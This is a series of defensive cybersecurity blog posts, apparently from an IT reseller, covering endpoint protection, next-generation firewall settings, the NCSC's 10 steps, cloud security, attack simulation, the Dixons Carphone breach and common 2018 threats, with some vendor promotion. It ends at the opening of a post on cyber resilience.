How to deploy next-gen endpoint protection- 10 key features

endpoint protection

Learn 10 endpoint protection features you should have in place to secure your business.

Anti virus protection has been one of the staples of cybersecurity protection every since virus attacks were spawned in the 90s.  

 

AV protection alone is no longer good enough because most vendors say they are effective against 99% of attacks which means at some stage they will be victims of a successful attack. That 1% of attacks use advanced techniques to breach security such as exploiting legitimate processes, or fileless malware injected when you visit an infected website. 

 

Endpoint protection is no longer a case to deploy and forget given the constantly changing nature of attacks. Modern endpoint protection now needs to eliminate blind spots and block unknown threats as well as stop known malware. 

 

Given that nearly all attacks must involve endpoint compromise at some stage, getting this component of the security solution right can go a long way towards ensuring your security posture is as high as it can be. 

 

A good endpoint protection solution should be agile and have elements of automation to ensure known and unknown threats are blocked. Some of the important features that need to be in place are outlined below. 

 

  1. Next Generation AV capability – endpoint protections systems need enhanced AV capability which has the ability to detect new attacks in real time – it, therefore, needs to look at behaviour and not just signatures of known attacks #
  2. Use multiple malware detection techniques – effective protection against malware needs multiple detection and protection techniques, these could include AV type signatures, fileless malware detection, sandboxing, machine learning, cloud lookup, vulnerable software classification and more. The more techniques the better as long as functionality is not compromised 
  3. Prevent fileless malware – most malware is carried in regular attachments such as word, pdf, excel however emerging attacks are fileless and endpoint protection needs to protect against attempts to hijack legitimate applications 
  4. Endpoint Detection and response – endpoint detection now needs to be more than responding after the event and after the attack has occurred. The solution does need to monitor all activities on the endpoint and be able to identify the beginnings of an attack based on unusual behaviour and respond accordingly. This will apply especially for new/unknown attacks that are appearing for the first time, signature-based techniques alone will not protect against these 
  5. Cloud Intelligence feed – the dynamic nature of attacks means that malware can use resources spun up and torn down on public cloud infrastructure in minutes, new endpoint protection systems need also to access constant feeds of threat updates from intelligence systems and specialist threat hunters 
  6. Cloud architecture – use a cloud-based architecture to make use of big data and up to date intelligence feeds. Also, enable user base to scale up seamlessly across fixed and remote locations as well as mobile clients.
  7. Share Intelligence across systems – once malware is detected on endpoint security systems the information should be shared with other systems such as email/web/network security devices to prevent further attempts or infection. The endpoint security should also be able to take feeds from these systems 
  8. Protect all endpoint types – all systems accessing data should be comprehensively protected, this must include Windows/MAC/Linux/Android and iOS especially given that mobile devices account for over 50% of web access 
  9. Dynamic analysis and sandboxing – unknown threats detection can be greatly enhanced with the ability to execute and test malware in a sandbox environment, the results can be fed back to endpoint protection 
  10. Log everything – a logging solution should be in place and logs from all critical assets sent to the logging solution. This will provide an invaluable tool for any future analysis especially when a breach occurs 

Surveys have indicated that most security systems have only a small subset of their features activated. Oftentimes features are not activated due to lack of knowledge or concerns that it may affect performance. Sometimes costs may be an issue because some features require additional licencing.

 

Not enabling features needs to be weighed up against the impact of a successful breach for which the costs in terms of financial, reputational and confidence may well outweigh the costs of doing it properly in the first place.

Cisco Umbrella

Be more GDPR compliant– tune up your Next Generation Firewall?

GDPR | Next Generation Firewall

Does effective cyber security protection and GDPR compliance mean that existing solutions will need replacing?

That depends on what you have deployed and how you have configured it. The changing nature of the cyber security threat does call for an agile and adaptable protection approach that will increasingly make use of automation and machine learning. In addition, the requires of GDPR call for an effective cyber security regime that protects data effectively and has monitoring and detection systems in place. 

 

A comprehensive approach requires multiple layers of protection not just to address the different types and areas of threats but also to provide an element of redundancy. Threats that may not have been picked up by say your endpoint protection solution may be detected by your network layer security solution for example. Research has indicated that most deployed security products only 10% of their features enabled and correctly configured.  

 

While some features just may not be relevant for a particular deployment, the main reasons why many businesses just don’t switch these features on include;  

  • Difficulty configuring the features
  • Lack of adequate skill set
  • Concerns it will slow down performance
  • Don’t understand how the features will benefit them 

 

It’s worth flipping the conversation on its head and viewing things in terms of the benefits, which once they are clear enough, turning on the required features becomes a no brainer. We are overwhelmed with all kind of statistics about the cost of cyber attacks – one startling one is a US government indicates that 75% of small business suffer a cyber breach, while the cost of the average cyber attack is over $1m. So, there are massive benefits to getting security right in terms of avoiding reputational damage and worst still sever financial costs or potential fines.  

 

Going back to the original question – do you need to replace the solutions already deployed. First, you need to look at what you have, how its configured and how much more you can do with it.  

 

A good area to start with is your firewall, if you have a well-featured Next Generation Firewall (NGFW) in place, you just need to make sure it is configured for maximum protection. Here are some of the features you need to enable to make it close to 90% effective – if you don’t enable them it would be analogous to having keys to all your business premises doors and windows but leaving all but a few ajar. 

1. Turn on Intrusion Protection Systems (IPS)

By default, your NGFW may have intrusion detection enabled (IDS) but given that most people don’t understand the alerts even if they are monitoring them, it’s worth automating the protection by enabling IPS.  You can implement a IPS to block attacks such as worms, virus and downloadable exploits/attachments.

 2. Enable network-based anti-virus protection

The feature will use deep packet inspection to identify threats. This is particularly useful to have a second bite at stopping threats not picked up by endpoint security. Also, some devices such as IoT types devices may be more vulnerable to such an attack but are unable to run anti-virus software. 

 3. Enable Malware protection

Malware may not be blocked by other technologies such as IPS or AV and therefore a good anti-malware engine must be deployed to help in the fight against this principal threat. Next Generation Firewall malware protection features can include indications of compromise based on event correlation, site reputation and sandboxing reports. 

 4. Use security intelligence feeds

This feature enables integration of near real-time global intelligence feeds to identify and block bad domains and emerging malware sites before they cause damage 

 5. Enable Sandboxing

Sandboxing is a useful tool in identifying and preventing attacks, it provides the ability to run and analyse executable code in an isolated environment. The results can be fed back to the NGFW to block or allow a file

6. User and Application Control

Compliance regulations mandate auditing capability that logs who, what, when users are accessing systems. You can configure a Next Generation Firewall to log and control what your users are doing and when they are allowed to. Importantly it can also manage and minimise the impact of non-productivity applications such as Netflix during business hours. 

7. Web Filtering and Protection

Blocks individual sites or categories that are either suspect or have no business relevance e.g. adult content, job portals etc. Suspect sites are also commonly used to inject malware onto unsuspecting visitors.

8. Segmentation of the network

Segment your internal networks into logical groups and protect each segment via an interface on your Next Generation Firewall. That way you will protect against lateral spread if a virus/malware gets in.

9. Log everything

A logging solution should be in place and logs from all critical assets sent to the logging solution. This will provide an invaluable tool for any future analysis especially when a breach occurs 

 

 

If you are not utilising the above capabilities it will leave you susceptible to threats that could otherwise have been mitigated. Make sure your security team is familiar with Next Generation Firewall capabilities and take full advantage of the available features to ensure your network is protected against the full spectrum of threats. Get more bang for your NGFW buck.

Free eBook: A View of the Cybercrime Threat Landscape

 

$2,235,018 per year

The average amount SMBs spent in the aftermath of a
cyber attack or data breach due to damage or theft of IT
assets and disruption to normal operations.

The amount is staggering, and enough to jeopardize the viability of
many companies. Yet the business benefits that come with the internet,
Cloud computing and other applications are impossible to forego
and remain competitive.

That’s why business owners and executives are asking one question:

  • Is our internet safe?

If your service provider can’t demonstrate how it is making you
company less likely to become a victim of cybercrime, then it is time
to consider alternatives.

In this eBook, we’ll outline what companies are up against
today, and how Cisco Umbrella can help bring you peace of mind.

Download the eBook here!

5 Key Cyber Security Elements For Your Business

Digitisation has meant the wholesale adoption of cloud services.

We are going to cover 5 key cyber security elements to help your business navigate the changing IT landscape. These elements are;

  1. Automation
  2. Lifecycle Approach
  3. Integrated Systems
  4. Layered Architecture
  5. Insight and Analytics

Digitisation is solving problems, creating opportunities and rewriting the way in which your business engages with your customers. At the forefront of the cloud services revolution is storage and SaaS. These functions give you the ability to design, build and deploy a new application. This is happening right now at unprecedented speed and scale.  

Cloud services bring with it great flexibility to your business along with a number of other benefits. While at the same time extending the cyber security attack surface and hence opportunities that the ‘bad guys’ have to compromise your users and data. At the same time, the sophistication of attacks is increasing as attackers take advantage of the very benefits that attracted you to the cloud.

Attackers have access to stolen credentials, host malware on legitimate cloud platforms such as AWS, Google and can generate legitimate certificates for illegitimate purposes thus appearing to be credible.

Your business needs a robust and advanced security architecture built on the back of an executive-sponsored cybersecurity policy to combat the threats. The security architecture needs to be an extension and enhancement of your existing security posture enabling seamless support of your users, data and applications anywhere they choose to work from.  

Surveying the common systems that you may already be deployed for cybersecurity protection, we are likely to see the following components; 

 

  • Perimeter Firewall – protecting your inside hosts from external threats/connections by using network address translation and stateful packet inspection 
  • Anti-Virus Protection – endpoint protection against known virus signatures 
  • Anti-Malware Protection – endpoint protection against known malware types 
  • Email Protection – scanning of email content to protect against malware attachments, phishing and spam  

 

As the IT systems and services landscape changes, it is necessary for your protection systems to be constantly reviewed and changes made where necessary to be relevant to the rapidly evolving landscape. The approach of IS teams to protection is evolving to the meet the emerging threats in the digitisation/cloud era whereby technology is now just a tool of the cybersecurity policy.

Your evolving approach should be about taking a holistic view that can adapt ahead of or in line with the threats. Five important elements of this evolving approach are outlined below. 

 

 

  • Automation – potential attacks now need to be stopped in their tracks automatically and cannot wait for attacks to be identified and mitigated by human interaction. In the digitisation, cybersecurity must have the ability to automatically learn about new threats and decide which ones to block while alerting the monitoring systems 

 

  • Lifecycle approach – security solutions must provide a methodology that addresses the 3 phases of a cyber attack, preventing attacks before they happen, detecting and blocking attacks in motion while also collecting details of security events through all phases in order to conduct detailed analysis and learn lessons from attacks 

 

  • Integrated systems – systems need to be integrated in order to share intelligence so that all components in the system of protection can update their configuration to reflect emerging threats and trends 

 

  • Layered Architecture – protection systems of necessity need to be based on a layered architecture thus following a methodology and approach designed around the business assets, priorities and policies. An architectural approach will incorporate multiple interconnected protection mechanisms and technologies to mitigate threats and stop attacks, such an approach will also provide the same levels of protection irrespective of whether a user is working remotely or on business premises 

 

  • Insight and Analytics – systems need to have a complete and comprehensive view of IS environment including who is connected, when and from where they are connected, and what they are doing. The system also needs to include incident and event monitoring to aid in an investigation of incidents and importantly provide the detailed information that may be required to report breaches of sensitive data under compliance regulations such as GDPR 

 

A number of new technologies have emerged which underpins the evolving approach to protection such as security internet gateway and cloud access security broker. These technologies and the role will be reviewed in our next blog.

Cisco Umbrella

10 Ways To Secure Your Business From Cyber Attacks

Cyber Attack

The cyber security threat landscape is constantly changing with the ever growing number and scale of attacks.  The consequent measures necessary to combat the threats need to be robust, comprehensive and agile. Simply put, it is about developing an effective approach and constantly testing and refining it. The sections below covers 10 essential recommended steps that should be taken to achieve a effective level of cybersecurity and is based on Guidance from NCSC.

Executive Risk Management

Because of the vital role that technology plays in most organisations today, information and their supporting systems need to properly categorised in the business risk profile. The impact of information and systems compromise could be more critical than many other types of business risks and result in reputational and financial damage.

It is important for the risks to be defined and communicated from executive level thus conveying the importance of information and systems.

Further essential steps that the Board should take include;

  • Establish a governance framework
  • Identify risks and approach to risk management
  • Apply standards and best practices
  • Educate users and maintain awareness
  • Constantly review policies

 

Education and Awareness

Training and awareness can help to establish a security conscious culture in the organisation. This could help to reduce the number of people clicking links in phishing emails or writing down passwords on post-it notes. Lack of awareness could result in; users connecting personal removable media that is compromised, users being subjects of phishing attacks, users seeing security as prohibitive and therefore trying to circumvent it. User ignorance to handling sensitive information may result in legal and regulatory sanction as will failure to report certain breaches.

Effective management of the user awareness risk include some of the following;

  • Create a user security policy as part of the overall corporate policy
  • Include cyber security in the staff induction – making them aware of their personal responsibilities to comply with the security policy
  • Security risk awareness – maintain awareness of ongoing security risks and guidance
  • Formal training and assessment – staff in security roles should embark on ongoing formal training and certification to keep up to date with the challenges they face
  • Incident reporting culture – enable staff to voice their concerns and report poor security practices

 

Secure Configuration

Systems that are not securely configured will be vulnerable to attack. A baseline secure configuration of all systems is essential to reduce risk of attacks and the potential for compromise. A lack of secure configurations and updated patching carries risks such as; unauthorised system changes occurring, exploitation of software bugs in unmatched systems and exploitation of insecure systems.

To avoid poor system configuration it is necessary for effective security controls be put in place such as the following;

  • Use supported software
  • Develop and implement policies to update and patch systems
  • Maintain hardware and software inventory
  • Maintain operating systems and software
  • Conduct regular vulnerability scans and act on results in a timely manner
  • Establish configuration  and control management
  • Implement white listing and positively identify software that can be executed
  • Limit privileged user accounts and user’s ability to change configurations

 

Network Security

Network connections could expose your systems and technologies to attack. A set of policies, architectural strategy and technical controls will help to reduce the chances of a successful attack which could include exploitation of systems, compromise of information in transit, propagation of malware, damage or illegal posting to corporate systems.

To effectively manage network security it is important to follow best practices and industry standard design principles at least.

All inbound and outbound traffic should be controlled, monitored and logged. This could be done with an advanced or next generation firewall, intrusion prevention techniques and anti-malware at the perimeter – in addition to endpoint anti-malware

Internal network protection is often ignored especially in the case of small networks. They should however include the following techniques

  • Segregate networks into groups based on functions and security roles
  • Secure wireless networks – only secure authorised devices should be allowed access to corporate networks
  • Secure administration – ensure administrative access is secure and defaults are changed
  • Monitor the network – monitor all traffic with intrusion prevention systems so that indications of attacks can be blocked and altered immediately
  • Testing and assurance- conduct regular penetration testing and simulate cyber attack exercises to ensure controls work

 

Managing User Privileges

Controlling user privileges to the correct level is important to ensure they have what they need to work effectively. Users with unnecessary rights should be avoided and is generally a major risk. If these accounts are compromised it could have a severe impact on your cyber security. Some of the potential harm that could be caused by such a compromise include; users could accidently or deliberately misuse their privileges and cause unauthorised information access

Attackers could also exploit these privileges to gain administrative level access and even negate security controls to increase the scope of their attack.

Some sensible steps that should be taken to manage these risks include;

  • Effective account management – manage the lifecycle of accounts from start to finish when staff leave, including temporary accounts
  • User authentication and access control – issue and enforce an effective password policy and incorporate two factor authentication for secure systems
  • Limit privileges – give users the minimum rights that they need
  • Limit the use of privilege accounts – limit the access to privileged rights and ensure administrators use normal accounts for standard business use
  • Monitor and logging – monitor user activity and log all events to an audit and accounting system for future analysis
  • Education – educate users of their responsibilities to adhere to corporate security policies

Incident Management

A security incident is inevitable for all organisations. An effective systems of incident management policies and processes will reduce any likely impact, enable speedier recovery and improve business resilience. Without an effective management system in place, some of the possible risks of an attack include;

  • Greater business impact of an attack through failure to realise the attack early enough and consequent slowness to respond resulting in more significant and ongoing impact
  • Potential for continuous or repeated disruption due to failure to find the root cause
  • Failure to conform with legal and regulatory standards which could result in financial penalties

It is important to manage the risk by taking some of the following steps;

  • Establish an incident management capability using in-house or specialist external service provider, create a plan and test its effectiveness.
  • Define reporting requirements
  • Define roles and arrange specialist training to ensure the correct skill base
  • Establish and regularly test a data recovery strategy including offsite recovery
  • Collect and analyse post incident evidence for root cause analysis, lessons learned and evidence for crime and/or compliance reporting

Malware Prevention

Malware is the most common form of security compromise and it is a fact that all organisations interact with known malware sites. The risk of malware can include; email with malicious content or links to malicious sites, web browsing to sites containing malicious content, introduction of malware through uncontrolled devices such as USB media or smartphones.

Inadequate controls for protection against malware could result in business disruption and/or loss of access to critical data.
Malware risks can be managed effectively using some of the following techniques;

  • Create and implement effective malware policies
  • Control import and export of data and incorporate malware scanning
  • Use blacklisting to block access to known malicious sites
  • Establish a defence in depth approach which includes security controls for endpoints, anti-virus, content filtering to detect malicious code, disable browser plugins and auto run features, ensure baseline security configurations are in place
  • Users should be educated regularly to understand the risk of malware, their role in preventing it and the procedure for incident reporting

Systems Monitoring

Systems monitoring provides the ability to determine how systems are being used and whether they have been attacked or compromised. No or poor monitoring prevents organisations from; detecting attacks against infrastructure or services, slows reaction to an attack resulting in increased severity of an attack, cause non compliance with legal or regulatory requirements
Systems monitoring risks can be prevented by taking the following steps;

  • Develop and implement a monitoring strategy based on the business risk assessment
  • Ensure that all systems are monitored, should include the ability to detect known attacks as well as having heuristic capabilities
  • Monitor network traffic to identify unusual traffic or large uncharacteristic data transfers
  • Monitor user activity for unauthorised use of systems
  • Fine tune monitoring systems to collect relevant events and alerts
  • Deploy a centralised logging solution with collection and analysis capability, and automated anomaly and high priority alerts
  • Align policies and processes to manage and respond to incidents detected by monitoring systems

Removable Media

Removable media such as USB memory devices are often involved in introduction of malware or removal of sensitive data. A comprehensive cyber security strategy must implement controls such as those listed below to effectively manage the risk posed.

  • Devise and implement a policy to govern the use of removable media. A standard for information exchanged on corporate systems should use appropriate and protected measures
  • If essential, the use of removable media should be limited only to designated devices
  • Automatically scan removable media for malware before any data transfer
  • Issue removable media formally to users and prohibit use of personal media sticks
  • Encrypt information at rest on removable media
  • Manage reuse and disposal of media to ensure data is effectively deleted or media destroyed and data retrieval prevented

Remote Working

Remote working for staff or remote support from suppliers is an effective and popular trend but can expose organisations to risk. Mobile working will necessitate the transfer of data across the Internet, sometimes to public spaces. These risks could lead to; loss or theft of data if mobile devices get stolen, compromise of credentials or data if screens are overlooked in public places, loss of user credentials if stored on a device, remote tampering through insertion of malware or monitoring of activity
Some of the recommended controls are listed below;

  • Create a robust policy to address the risk, this should include identifying who is authorised, what kind of information they can access, increased monitoring for remote connections
  • User training to include; awareness of the risks, securely storing and managing credentials, incident reporting
  • Develop and apply a secure baseline for remote devices
  • Encrypt data at rest and data in transit for remote/mobile devices

 

5 Basics of Cloud Security

The basic objective of a cloud security strategy is to provide a method to monitor and protect the flow of information to and from cloud hosted services. There has been and will continue to be a shift towards public and private cloud services as the age of digitisation is increasingly being embraced by organisations. 

 

According to Cisco’s Annual Cyber Security report, one of the principle reasons why organisations are deciding to host corporate applications in the cloud is increased security. 

 data security

On the other hand many small and medium organisations are adopting cloud technology without a clear strategy resulting in the blurring of edges of responsibility between the cloud provider and the organisation. In the eyes of cloud security providers, there are clear responsibilities and boundaries as illustrated in the graphic below. 

 

Security in the cloud is a shared responsibility: Cloud Security, DNS, IaaS PaaS Saas 

Cyber attackers are increasingly taking advantage of this blurring of the boundaries to exploit systems. It is important to undertake a proper risk assessment before cloud services are adopted. This will enable a clear understanding of the risks and a consequent strategy to mitigate the risks.  

 

The basic approach to cloud security will be based on the risk profile, it essentially needs to address the different phases of the cyber security threat, namely before, during and after an attack. It should be an extension of the organisations security approach to the on-premise information systems and data which generally address the question, who is allowed access to what information. 

 

Some of the key features that need to be addressed with a cloud cyber security approach include; 

  • Visibility and Control
  • Securing Cloud Applications
  • Extended Protection
  • Virtualise the Security Architecture
  • Threat intelligence

 

Visibility and Control 

Users will try to use whatever they can to get the job done. Organisations need visibility and control of what applications are being used in the cloud and remotely, especially with the growth of new SaaS applications. Visibility enables an understanding of what is being used in line with policy, what is out of policy and what is a threat. Visibility is the first step to controlling and securing the organisations environment based on what services should be provided. 

 

Securing Cloud applications 

As SaaS applications are increasingly being deployed in public clouds such as Amazon Web Services and Azure, it is vital to ensure that the cloud platform is secure. Even though the cloud providers will deploy their own security solutions, organisations also need to implement independent security systems to secure the user and the data as this is not the responsibility of the cloud provider. In it’s recent cyber security report, Cisco identified that a major growth area for cyber attacks was the misuse of legitimate cloud services to host malware. Hence the need to secure services in public clouds cannot be understated. 

 

Extended Protection

As remote connectivity and branch networking trends increase in popularity, the security solution should be adaptable to extend the necessary features such as firewalling, threat management and anti-malware capabilities to the edge of the network as opposed to the current centralised deployment model. This functionality should be provided on endpoints, remote connections and remote offices and vitally to devices working off site such as Internet Cafes. 

 

Virtualise the Security Architecture 

The need for security is now pervasive at the client, the branch, the HQ as well as public and private clouds where SaaS applications are located. This necessitates the capability for a virtualised security architecture where the panoply of security functionality can be deployed easily at any location. This approach also enables the organisation to scale security at speed which will meet business demands for rapid deployment of new services while avoiding security being an afterthought. 

 

Threat intelligence 

Most organisations deploy security components from multiple vendors. An intelligent approach to securing information and systems in the emerging environment must make use of threat intelligence to overcome any cross vendor incompatibilities. This is the ability to take intelligence feeds from other sources such as other security vendors feeds and make context based threat assessments relating to your organisation and what it means for you. This assessment can naturally feed into automated protection mechanisms. 

 

In our next blogs in this series, we will cover off some best practices approaches to cloud security and discuss some of the technologies being used. 

 

Penetration Test: the new cyber test in town

penetration test, cymulate

 

When was the last time you had a penetration test of your network or a vulnerability assessment? Penetration testing has traditionally been an annual event for most organisations. Of late we have seen vulnerability assessments delivered as a service with the ability to run tests on demand. Invariably vulnerability assessments are still run once a year oftentimes due to resource shortage and in many instances it’s just not a high priority because nothing bad has happened – or at least we are not aware of it. 

 

On the other hand, industry security statistics would indicate that the general approach to security could well be a disaster waiting to happen, or worst still a disaster that has happened but just not discovered yet. Yes we know that enterprise organisations and some medium sized organisations have a highly security regime in place and manage security according to best practices. Despite the efforts of the aforementioned organisations the numbers are still overwhelmingly in favour of the bad guys as illustrated below. 

 

  • 100% of organisations interact with known malware sites – simply put, everyone is likely to be infected at some stage 

 

  • 99 days average time to detect a breach of a pool of known vulnerabilities  

 

  • 4 hours average time it takes cyber attackers to steal data 

 

  • 365 days – time between vulnerability assessments and penetration tests 

 

For sure both vulnerability assessments and penetration test have proven to be valuable tools in the arsenal for protecting IT systems from compromise, but only when used effectively and frequently enough. 

 

One challenge however that either approach may find very difficult to keep up with is the rate of change as newer, more sophisticated and persistent threats and exploits appear on an almost daily basis. 

 

An emerging approach to confront the threats head on while enabling organisations to take the initiative is to deploy a solution that conducts a series of simulated attacks based on known and emerging threat vectors. With this type of approach, you can now address the question “how do you know your security systems are working?”.  

How many times have you seen a detailed and impressive list of access control lists only to be undone by the second to last line “permit ip any any”. 

 

Without comprehensive and persistent testing, any assurance of cyber security is based purely on assumption and best guess.  

Yes you have defences in place such as firewalls, endpoint security, anti-malware solutions but how do you know that they are really effective against known/unknown cyber threats. The assumption is that you have the right defences in place to protect from vulnerabilities and they security solutions are optimally configured. You only truly know for certain when an attempted breach has been attempted, detected and blocked. On the other hand you may have been hacked and you either never know or you don’t know for months after the event when the hackers have stolen day and moved on to other victims. 

 cyber security statistics

 

A simulated attack is a method of safely checking whether your systems are safe and your data is protected from vulnerabilities. The simulation can run a range of attack vectors to test your defences against a range of vulnerabilities. Simulated attacks that are successful will give you a clear understanding of your current vulnerabilities and how to mitigate them – it gives you actionable intelligence of the holes in your cyber defences. It can also validate the security controls that are in place and be used to test your security incident response procedures. Remember cyber defences is not just about preventing attacks, it’s also about what you do when the attacks occur to remediate and recover. 

 

A simulated attack service can also be used to undertake real time validation especially when changes are made or as you become aware of new vulnerabilities. When run as a cloud service, it can be run repeatedly to provide ongoing security posture assurance. A simulated attack service is definitely a service worth considering augmenting a comprehensive security posture assessment approach that includes penetration testing and vulnerability assessment. Simulated attacks can be seen as an emerging solution that is geared to match the rapid and changing nature of cyber threats. 

 

Cymulate, penetration test 

5 Takeaways from the Carphone Warehouse Breach

The Carphone Warehouse breach is the biggest so far announced in the post GDPR era.

What are the salient points to note from this breach? 

  1. 6 million records accessed 
  2. NCSC, ICO, FCA investigating 
  3. 3 million records accessed in 2015 breach 
  4. Cyber security risk identified by board in last FY report 
  5. If GDPR applies, maximum fine of £420m could apply 

 

A recently announced massive cyber attack at Dixons Carphone Warehouse has resulted in significant unauthorised access to millions of records including personal data. It appears that two breaches occurred which resulted in; 

 

  • 6 million customer records being stolen including 5.9 million payment card details  
  • 1.2 million customer records including name, address, email 

 

In January Carphone Warehouse were fined £400,000 for a breach that occurred in 2015 when 3m customer records (including personal details) and 1,000 employee records were stolen. 

 

Dixons say the breach was only discovered in the week leading up to the announcement and it actually occurred in the July 2017. Under the Data Protection Act they would be liable to a maximum fine of £500,000. Under the new GDPR regulation the fine could rise to a maximum of £420m based on last years’ global turnover of £10.5bn. 

 

In their most recent report, Dixons identified information security as a risk and their potential vulnerability to malware and cyber attacks. They identified potential consequences that could include reputational damage, reduced cash flow, financial penalties, reduced revenue and profitability, loss of competitive advantage. Dixons did appear however to be heading in the right direction to manage the risk ensuring senior management oversight including a Strategic Improvement Plan and increased investments targeted at managing the information/cyber security risk. 

 

The independent regulator the ICO is investigating the current breach along with the FCA and NCSC. The ICO has said it is yet to determine whether GDPR or the 1998 Data Protection regulations will apply. 

 

The NCSC is working on how the breach has impacted UK citizens and what measures can be taken to prevent such a breach re-occurring. They have also published guidance on what to do for people who think they have been affected by the breach. 

 

The CEO Alex Baldock has apologised saying that they have fallen short of expected standards. He confirmed that they have called in cyber experts to investigate as well as relevant authorities and the unauthorised access has now been blocked. 

 

Anyone affected or concerned about their personal data being accessed and how it could be used should contact Action Fraud. 

 

The breach came to light as a result of a massive attempt to compromise the cards in a card processing system, this means that someone tried to use the card details to take unauthorised payments. 

 

Dixons shares fell 6% following the announcement of the breach. 

 

Useful Resources

GDPR Readiness Test [Checklist]
GDPR 12 Step to take NOW [Infographic] 
9 Steps to Implement a Security Management Tool [eBook]

 

 

5 Cyber Security Threats Businesses are Facing in 2018

5 cyber security threats
We all know the cyber security threats landscape is rapidly evolving and it is a real struggle to keep apace with the threats much less get ahead of them, which ideally is where we should be.
Organisations especially those small to medium sized ones have limited resources in terms of people, money and time to commit to all the areas they need to focus on.
It is therefore vital that their approach to cyber security is focused on the areas that will have the greatest impact in terms of threat prevention. Let’s discuss the most common cyber threats that organisations are likely to face which therefore should help to determine the main areas where protection efforts need to be focused. These threats are;
  • Socially Engineered Malware
  • Password Phising
  • Unpatched Software
  • Social Media Threats
  • Advanced Persistent Threats

Socially engineered malware

Every year, hundreds of millions of successful attacks are conducted by socially engineered malware programs. A typical form of this is data encrypting ransomware which is downloaded either in email attachments or trojan horse software downloaded from a site hosting malware. The unsuspecting user is enticed into clicking a link or opening a document which then installs the malware, oftentimes the user is prompted to bypass security controls if they are in place for this particular type of exploit. The malware is installed on the host machine and can then disable defences  such as anti-virus, conduct callbacks to command and control centres which then lead on to the exploits. Exploits could include data gathering and exfiltration or encryption of data and horizontal propagation of the malware.
This type of threat sometimes requires the use of elevated privileges. Techniques that could be used to help prevent this type of threat include;
  • avoiding giving elevated privileges for daily tasks
  • constantly educate users about these type of threats
  • deploying advanced endpoint protection
  • not relying solely on traditional anti-virus

Password phishing

Phishing has become a huge industry for cyber scammers and it is estimated that approximately 80% of global email is spam. Anti-spam techniques deployed by email providers are becoming better are blocking spam how ever the attackers are constantly refining their approach and inevitably some is still getting through to user’s inboxes. Most of us are so busy we do not bother to hover over the links to check for a valid url and
sometimes they are so well crafted it is so easy to miss.
The best protection against phishing apart from good anti-spam software is user education along with policies that encourage the use of 2 factor authentication such as smartcards, sms messages, etc.

Unpatched software

Unpatched software is a major threat due to the existence of known vulnerabilities that could be protected from if the latest available patch is applied. This problem while common for client applications such as web browsers, and ancillary apps such as adobe and java are also quite common on server systems. I am sure you have seen many instances where critical servers running core business systems are unpatched and carry literally hundreds of vulnerabilities.
Software patching needs to be a part of the IT operations processes and undertaken in a regular and systematic manner to avert an easily avoidable vulnerability.

Social media threats

Social media is pervasive and an essential part of an organisations digital presence. It has therefore become a target for cyber attackers to find exploits and cause reputational damage or extort money from unsuspecting users and owners. The threats could start off as simply as a friend request or application install which then develops into something completely different. One example is a response to a post where a visitor may voice
dissatisfaction with a service. The response offers to provide assistance and redirects the person to a fake site where their usernames and passwords are requested and then exploited on the real social media site.
Yet again user education is a must to help protect against this type of threat and 2 factor authentication could also prevent compromise of username and passwords.

Advanced Persistent Threats

The majority of large organisations have been the subject of advanced persistent threats but that is not to say that small-medium organisations are not affected by this also. The attacker may initially use phishing or trojans to infect one machine but once they get hold of a machine, they extend their reach throughout an organisation and steal data within hours oftentimes remaining undetected for months.
The best way to combat advanced persistent threats is to deploy next-generation detection and protection capabilities. Typically such measures will profile the normal network traffic and behaviour thus creating a baseline against which anomalous behaviour can be profiled and alerted.
You may have noticed an underlying theme in terms of the best way to
mitigate most of these threats involved user awareness. The benefits of this cannot be understated and there are some low cost good user training subscriptions that could save organisations a ton of money in costs associated with a successful cyber attack.
It is also however very important to do the basics well such as patching, endpoint protection, password policy and network security.

Is Cyber Security still a Maze?

InfoSecurity Europe 2018
I attended Infosec2018 this week at London Olympia. It was a vibrant event as you can imagine with every exhibitor enthusiastic to promote their wares. They were also eager to grab your details with their ‘GDPR compliant’ badge scanner. As a technologist of too many years to mention (I started in IT when 5-inch floppy discs were the rage), what really dawned on me is that it is understandable why many small businesses are not fully engaging in a comprehensive cyber security strategy.
There are many vendors with absolutely great solutions targeted at fixing some particular problems or protecting a specific area of potential exposure. And of course, there were many GDPR compliant or GDPR enabling solutions on view. The information security landscape is increasingly becoming more challenging as technology becomes more pervasive, as the cyber attack surface increases and as the sophistication and scale of attacks also increases to match.
Cyber Security really needs to be demystified to a large extent to make it more accessible to organisations. What would have really been a helpful approach from vendors would be a means of sharing a common language of Cyber Security. A means of easily identifying where each vendors solution sits in the Cyber Security stack and what it talks to vertically and horizontally.
This would be akin to placing their offering in a Cyber Security jigsaw puzzle so that organisations can clearly see where it sits, what problems it solves and importantly what problem it doesn’t solve. Such an approach would make it easier for decision makers to engage and fully commit to adopting and implementing a comprehensive strategy for effective Cyber Security.
It has been an ongoing bug bear of mine that businesses don’t easily have a conversation about their security needs. There are some obvious reasons for this such as lack of resource, lack of understanding or no buy-in at senior management level. There is also a tendency to not want to do anything because “we’ve been OK so far despite all the doom and gloom”.
This was reinforced in a very enlightening conversation I had with the team at the National Cyber Security Centre (the public face of GCHQ). They strongly advocated that cyber security ownership now has to be at CxO level of organisations. It will only be taken seriously, and the right strategy and resources effected when CxOs understand the business imperative of getting this right and the consequences of not doing what needs to be done.
He lamented the fact that too many organisations are sitting back and waiting until it’s too late before they do something.
He also advised rightly so that it was not actually so difficult to achieve a respective level of Cyber Security. The NCSC have published guidelines on this in terms of 10 Steps to achieve Cyber Security and this really is very straightforward practical actionable guidance.
I must say of all the people I spoke to during the day at Infosecurity, he was the most impassioned and engaged individual (long live our public services).
On a final one of my reasons for going to InfoSec was to research products that I think are unique and can fulfil customer needs. I actually met a supplier that has been named Cool Vendor by Gartner. Being my usually cheeky self I said “you guys don’t look cool”, however after spending some time understanding what the product is able to do to expose Cyber Security gaps, I am convinced that every organisation connected to the Internet needs such as service. Literally within seconds of clicking a button you can test for a range of exposures and vulnerabilities. Lack of visibility is a challenge we all face when it comes to digital communication but it is actually ‘cool’ if you can see your exposures and do something about them before it’s too late. We are in the process of signing up with this cool vendor and will bring you news about the service in the near future.

Cyber Resilience | The Framework you Should Follow

Have you sometimes found yourself bewildered by the sheer volume of bad news out there especially about emerging cyber threats and actual attacks. It is not uncommon to wonder when you will come under a similar threat or worst still is it happening already but you just haven’t detected it yet. What would give us more comfort is understanding that we were cyber resilient to threats to a large extent, sure nothing is ever 100% guaranteed but it would sure be good to a high a high level of confidence about our ability to survive such an eventuality.

So what would good cyber resiliency actually look like?

